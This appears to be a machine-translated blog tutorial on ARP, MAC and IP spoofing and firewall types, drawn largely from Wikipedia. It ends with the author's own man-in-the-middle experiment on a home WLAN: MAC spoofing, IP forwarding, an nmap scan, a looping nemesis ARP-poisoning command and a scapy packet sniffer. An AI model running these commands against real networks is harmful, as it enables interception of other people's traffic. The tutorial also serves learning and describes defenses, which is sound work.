First, let's get started with Wikipedia. Then try to launch a man-in-the-middle attack.
Theoretical Basis
The following content is from Wikipedia.
Arp Spoofing
Attackers send forged ARP messages over the LAN. It is usually used to associate the IP address of another host to the attacker's MAC address. Redirect the IP address of the host to the attacker.
ARP spoofing allows attackers to intercept data frames on a local LAN, change traffic, or block traffic. It is usually used as another attack method, such as DOS, MITM, or the start of session hijacking.
The attack is confined to the LAN Using ARP.
LAN communication requires converting the IP address at the network layer into the MAC address at the data link layer for transmission at the data link layer. When you know the IP address of a host, you need to obtain its MAC address (ARP
Request ). The host response (ARP reply) contains the MAC address of the IP address.
The ARP protocol is stateless, and the host automatically caches any ARP reply they receive, whether or not they have been requested. Even if there is no expired ARP cache, it will be overwritten by the new ARP response. The host cannot authenticate the package source.
Generally, an ARP attack may come from an attacked machine or directly from an attacker's host. Generally, the target of an attack is to associate the attacker's MAC address with the IP address of the target machine, which means that the traffic sent to the target will be sent to the attacker. Attackers can:
- Truncate the data and forward it to the target. (Eavesdropping)
- Change the data content and send it to the target (MITM)
- Attackers can initiate DOS attacks by dropping all or some packets.
Defense measures include:
- Static ARP table.
- Some software performs some form of authentication or cross-check ARP response. DHCP servers, independent hosts, Ethernet switches, and other network devices all have this function. For example, associating multiple IP addresses with one MAC address may indicate ARP spoofing.
- The operating system does not respond. Linux ignores any unsolicited response, but uses visible requests from other machines to update the cache. Solaris only updates cache entries after timeout. In Windows, you can
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters, ArpCacheLife, ArpCacheMinReferenceLife, ArpUseEtherSNAP, ArpTRSingleRoute, ArpAlwaysSourceRoute, ArpRetryCount
Configuration.
- Host Defense. It is possible to reject any response updates that are different from the MAC address in the cache. It may accept different responses, but it will detect whether the previous MAC address is still there. These are based on the existing cache MAC address is valid.
- Passive detection. Detects ARP requests and responses on the network to create a IP-MAC Database
- After an IP address is assigned, the DHCP server creates and maintains a list for the gateway.
Mac Spoofing
Is a technology used to change the MAC address of an interface on a network device. The MAC address cannot be changed when it is hard-coded to the NetWork Interface Controller. However, there is a way for the operating system to believe that the NetWork card uses the MAC address specified by the user. This usually changes the identity of a computer, but it is quite simple.
It is usually used to bypass the access control list of servers or routers, or hide a computer or impersonate other network devices. It may be legal and sometimes illegal.
- To use new hardware or multiple hardware on an ISP bound to a MAC. However, attackers can also use this technology.
- To meet some software requirements for binding MAC addresses
- Identity hiding to protect privacy. The MAC address of a Wi-Fi connection is not encrypted. Therefore, in monitor mode, the NIC can easily collect MAC addresses. In order not to be tracked, attackers can use MAC spoofing. However, attackers can use this technology to impersonate Authenticated Users and perform illegal activities, which is difficult to detect.
MAC spoofing hosts generally receive messages (some particularly secure switch configurations can prevent transmission of such packets). However, MAC address spoofing is limited to local broadcast domains.
IP Spoofing
It is a behavior of forging the source address in the IP protocol package. One is to hide the identities of counterfeits, and the other is to pretend to be other machines.
Attackers modify the source IP address segment of the IP address header to make it seem to come from other machines. The machine that receives the counterfeit packet returns the packet to the wrong machine. Generally, attackers do not care about returned packets, or they can reliably detect responses.
In certain circumstances, attackers may view or redirect data packets to their own machines. This often happens on a local LAN or local wireless LAN.
IP spoofing is often used for DOS attacks, because packages come from different addresses, it makes filtering difficult. This makes the IP-based defense no longer effective. Backscatter is a statistical technology based on Invalid Address packages. However, more complex attacks can avoid invalid addresses.
IP spoofing is also used to bypass IP-based authentication. Although this method changes thousands of packets at a time, it is very difficult to attack the remote system, but it is effective between trusted Intranet machines.
IP spoofing is sometimes used for website performance testing.
Services that are vulnerable to IP spoofing include:
- RPC
- Any IP-based authentication
- X window System
- R (emote) series services such as rlogin and rsh
Defense methods
- Package filtering. The gateway filters the IP addresses of the egress or ingress packages, such as urpf (unicast Reverse Path Forwarding ).
- The design is not an IP-based network protocol and service.
- Some upper-layer protocols provide some protection. For example, TCP uses serial numbers to communicate with remote machines to ensure that the packets arriving are part of the established connection. Because attackers usually do not see any response packet, they must guess the serial number to hijack the connection. The TCP serial numbers of some older systems or network devices can be predicted.
Email Spoofing
I will try again later. In fact, the git server we set up on the Intranet sent an email to my mailbox and thought of it as soon as it was received.
URL Spoofing
Let's talk about it later. I think of the URL hacking of the wretched stream on wooyun.
FireWall
From the perspective of the development history, the development of firewall is divided into three generations:
Package filtering. This generation of firewalls only filters a single packet. If a matching rule is found, the package is discarded (packet loss occurs quietly) or rejected (an error is returned. Generally, these rules are the package source address, Destination Address, protocol, and ports for TCP and UDP. It has no information about the connection and is stateless.
This generation firewall mainly works on the lower layer and looks at the Source and Destination addresses and ports of the lower transmission layer.
Stateful filtering. Not only does it have the first generation firewall function, but it also works on the fourth layer of the OSI transport layer.Connection status
As an evaluation standard. It will be retained until enough packets are accepted to determine its connection status. It records all established connections and determines whether a package is the beginning of a new connection or a part or not of an existing connection.
Application-level firewalls work at the application layer. It can understand the upper layer protocol, so it can detect whether an illegal protocol is trying to pass through the firewall through a valid port. The legendary next-generation firewall (NGFW) is to expand and deepen the application layer stack inspection.
The firewall can be classified based on the intercepted communication location and the tracked status:
The network layer or package filtering mainly works on the TCP/IP layer relative to the underlying layer and relies on Rule filtering. There are two types:
Stateful: stores the source destination address port in the current connection phase. If a package does not belong to an existing connection, evaluate it based on the new connection rules. If a package belongs to a known connection, it is processed according to the connection processing method.
Stateless. Requires less memory and faster. Suitable for handling connectionless protocols. However, you cannot make complex decisions based on the communication status. One example is iptables.
Application layer firewall: interprocess communication is intercepted through sockets and various rules are used for filtering. It cannot defend against underlying vulnerability mining and is being replaced by a mandatory access control (MAC) application firewall, that is, a sandbox.
Proxy: whether it is dedicated hardware or software, it takes effect by responding to the input package as an application. The proxy server is the gateway from one network to another for a specific network application and acts on behalf of users in the network. Proxy servers allow more thorough isolation between the Intranet and the Internet, but attackers can also use a machine as a proxy to attack the internal network.
NAT-Network Address Translation: firewalls usually have these functions, and machines after the firewall usually have private IP addresses. It was originally used to mitigate the crisis where ipv4 addresses are insufficient, but unexpectedly became an important defense method for anti-network detection.
Rogue DHCP
Forge a DHCP server.
DNS Series
Put it in DNS.
Next, I tried a man-in-the-middle attack. I opened my mobile phone and notebook in the WLAN.
0.0) mac spoofing
sudo ip link set eth0 downsudo ip link set dev eth0 address 38:AA:3C:E6:FE:69ip link set eth0 up
0.1) Preparation
ifconfig wlan0 promiscecho 1 > /proc/sys/net/ipv4/ip_forward
1) Search targets
sudo nmap -sS 192.168.1.0/24
2) arp attacks
while truedosudo nemesis arp -v -r -d wlan0 -S 192.168.1.102 -D 192.168.1.1 -h E8:39:DF:08:F4:FB -m EC:88:8F:B4:D6:68 -H E8:39:DF:08:F4:FB -M EC:88:8F:B4:D6:68sudo nemesis arp -v -r -d wlan0 -S 192.168.1.1 -D 192.168.1.102 -h E8:39:DF:08:F4:FB -m 68:5D:43:2E:AA:59 -H E8:39:DF:08:F4:FB -M 68:5D:43:2E:AA:59done
3) Listen
pkts = sniff(filter=”tcp and host 192.168.1.102”,iface=”wlan0”,prn=lambda x: sprintf(“{IP:%IP.src% -\>%IP.dst%\\n}{Raw:%Raw.load%\\n}”))